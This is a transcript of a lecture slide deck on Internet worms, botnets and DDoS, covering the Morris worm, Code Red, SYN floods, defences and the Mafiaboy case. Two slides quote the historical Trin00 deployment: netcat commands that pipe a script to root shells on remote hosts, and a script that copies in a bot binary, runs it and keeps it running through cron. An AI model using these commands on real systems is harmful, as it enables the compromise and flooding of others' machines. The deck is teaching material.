1 / 26

Worms, Botnets, and DDoS

Worms, Botnets, and DDoS. Wide-spread Internet attacks. Worms. Active network propagation Replicates (like a virus) Operates independently of users Compromise remote machines Insecure services Copy themselves to that machine. Morris Worm. Released on Nov 2, 1988

velma-alexander
Download Presentation

Worms, Botnets, and DDoS

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Worms, Botnets, and DDoS Wide-spread Internet attacks

  2. Worms • Active network propagation • Replicates (like a virus) • Operates independently of users • Compromise remote machines • Insecure services • Copy themselves to that machine

  3. Morris Worm • Released on Nov 2, 1988 • Morris was a Cornell Ph.D. student • Objective • A program to “live” in the Internet • Steps • Determine where to spread • Spread its infection • Remain undiscovered and undiscoverable

  4. Morris Worm • Where to spread • netstat -r -n • /etc/hosts • Yellow pages distributed hosts file • Tries all local addresses

  5. Morris Worm • Security flaws to exploit • Weak password for rsh • Buffer overflow in fingerd program • Trapdoor in sendmail mail handler • DEBUG mode

  6. Morris Worm • Disguise • Remove all the traces from disks • Save all files in memory, encrypted • Change its process name periodically • Oops • sendmail log files • Monitoring • 1/15 chance it sends a byte to a server at Berkeley

  7. Morris Worm • Effects • Bug in the worm • Resource exhaustion, disconnection, isolation • $10-100M damage • Robert? • Tried and convicted of violating the 1986 Computer Fraud and Abuse Act • First conviction! • 3 years probation • 400 hours of community service • $10,000 fine

  8. Code Red • Appeared in the middle of 2001 • On July 19, it infected more than 250,000 systems in nine hours • Infection • Using Microsoft’s Internet Information Server • Using buffer overflows • Propagation • Checks IP addresses on port 80 of the PC to see if the web server is vulnerable

  9. Worm Spreading • What is different from a virus? • Finding targets • Scanning random addresses • High rate of traffic • Defense? • Be specific

  10. Botnets • Zombies • Many available networked computers • High-speed Internet connections • Automated attacks • No sophisticated hacking • Software and OS are homogeneous • 10,000 to 50? Million

  11. Uses of Botnets • DDoS • DSL @ 300 Kbps X ??? Bots = Flooded • Extorsion • Spam • Ad revenue • Phishing & ID theft • Spreading malware • Sell • Compromise machines for others’ use

  12. Anatomy of a Zombie • An Example (from GRC.com, 2001) • rundIl.exe (rundIl.exe-- note the ‘eye’) • Check the font in your Windows registry • Connection • IRC server • Join a secret, password protected channel • Wait for instructions • Download a trojan • Attack on command • with or without trojan

  13. Sample Connections: Trin00 • Use netcat (nc) • Pipe a shell script (shell commands) • Root shell listening on port 1524/tcp ./trin.sh | nc 128.aaa.167.217 1524 & ./trin.sh | nc 128.aaa.167.218 1524 & ./trin.sh | nc 128.aaa.167.219 1524 & ./trin.sh | nc 128.aaa.187.38 1524 & ./trin.sh | nc 128.bbb.2.80 1524 & ./trin.sh | nc 128.bbb.2.81 1524 & ./trin.sh | nc 128.bbb.2.238 1524 & ./trin.sh | nc 128.ccc.12.22 1524 & ./trin.sh | nc 128.ccc.12.50 1524 & . . .

  14. Sample Script • The script "trin.sh” looks like this: • #Remote copy of the “leaf” program to an unsuspicious location • echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen” • echo "chmod +x /usr/sbin/rpc.listen”#Make it executable • echo "echo launching trinoo" • echo "/usr/sbin/rpc.listen”#Run “leaf” • #Set it up as a Cron job. Restart it every minute. • echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron” • echo "crontab cron" • echo "echo launched" • echo "exit"

  15. Attack Topology Daemons Masters Attackers dns1.uta.edu sCUdATK www3.security.com mail.company.com ^^hATEr^^

  16. New Topologies • Trin00 • IRC: No master to catch • Conficker • 7M Bots • Rotating Web sites • Storm • Structured P2P Network • Millions of bots for spam and DDoS

  17. Distributed DOS = DDOS • Step 1 • Get a lot of bots (100’s) • Step 2 • Flood the target full blast from every bot • IP spoofing?

  18. Real World DDoS 0.224610 119.226.89.96 -> victim TCP 33081 > 60785 [SYN] Seq=3693150756 Ack=0 Win=32768 Len=0 0.224610 victim -> 223.144.66.65 TCP 52284 > 19586 [RST, ACK] Seq=0 Ack=423694111 Win=0 Len=0 0.224610 3.41.60.116 -> victim TCP 5594 > 40940 [SYN] Seq=2132997225 Ack=0 Win=32768 Len=0 0.224610 victim -> 50.180.94.71 TCP 33289 > 11952 [RST, ACK] Seq=0 Ack=1790973261 Win=0 Len=0 0.224610 244.214.39.108 -> victim TCP 38802 > 23759 [SYN] Seq=747020069 Ack=0 Win=32768 Len=0 0.224610 victim -> 198.183.172.81 TCP 57223 > 43146 [RST, ACK] Seq=0 Ack=3749566807 Win=0 Len=0 0.224610 64.81.138.119 -> victim UDP Source port: 1026 Destination port: 24661 0.224610 victim -> 96.247.9.94 TCP 48931 > 50749 [RST, ACK] Seq=0 Ack=1188357973 Win=0 Len=0 0.224610 103.227.64.42 -> victim TCP 45715 > 63366 [] Seq=3389528594 Ack=0 Win=16384 Len=0 0.224610 victim -> 211.107.218.23 TCP 12666 > 48183 [RST, ACK] Seq=0 Ack=2803931407 Win=0 Len=0 0.224610 87.29.46.64 -> victim TCP 17092 > 47365 [SYN] Seq=3446572548 Ack=0 Win=32768 Len=0 0.224610 victim -> 58.24.148.57 TCP 26667 > 9797 [RST, ACK] Seq=0 Ack=3710546447 Win=0 Len=0 0.224610 8.116.40.43 -> victim TCP 38367 > 32889 [SYN] Seq=1914703987 Ack=0 Win=32768 Len=0 0.225448 victim -> 68.132.173.125 TCP 64470 > 35524 [RST, ACK] Seq=0 Ack=1819819023 Win=0 Len=0 0.225448 75.115.186.26 -> victim TCP 4082 > 29772 [SYN] Seq=4245878839 Ack=0 Win=32768 Len=0

  19. SYN=1, seq=963 SYN=1, seq=382, ack=964 SYN=0, seq=964, ack=383 SYN Flood • TCP 3-way handshake State LISTEN SYN_RCVD ESTAB.

  20. SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN=1, seq=963 SYN_RCVD SYN_RCVD SYN_RCVD SYN_RCVD SYN_RCVD SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN=1, seq=382, ack=964 SYN Flood • TCP 3-way handshake State LISTEN

  21. SYN Flood • Server • Enters the SYN_RCVD state • Limited # of connections allowed • Legit users can’t connect • Fix 1: allow more connections • Attack on Fix 1: Memory, processing, and bandwidth • SYN Flood • Open a TCP connection (SYN) • Don’t respond to the SYN/ACK • Repeat!

  22. SYN Flood +’s & -’s • Advantages • Less cost than brute force • Can look the same as legit traffic • Disadvantage • SYN/ACK traffic comes back • Unless spoofed IP • But far less than sent, on average

  23. Defenses • Filtering • SYN floods: check for repeated IPs • Only allow specific forms of UDP • Expensive • $12K/Mo. • Network response can drop by several seconds • Pay the Extortion fees

  24. Detecting DoS Attacks • Not immediate • Network failure • Slashdot effect • Easy to hide • Use spoofed IP packets and reflection • How do we find these attackers?

  25. Mafiaboy • 2000: Amazon, Dell, eBay • http://www.ecommercetimes.com/perl/story/3044.html “The teen hacker apparently made himself easy to find. He reportedly used an ISP that tracked his activities and made boastful claims -- including information only the hacker would know -- in Internet chat rooms.” • http://www.zdnet.com/zdnn/stories/news/0,4586,2552467,00.html But in what could be a warning to Web sites, authorities said the hacker was not especially skilled technically, yet he was able to cripple a handful of prominent Web sites. “He had a good knowledge of computers, but he was not what we would call a genius” said Staff Sergeant Jean-Pierre Roy of the Royal Canadian Mounted Police (RCMP) during a news conference Wednesday.

  26. The End

More Related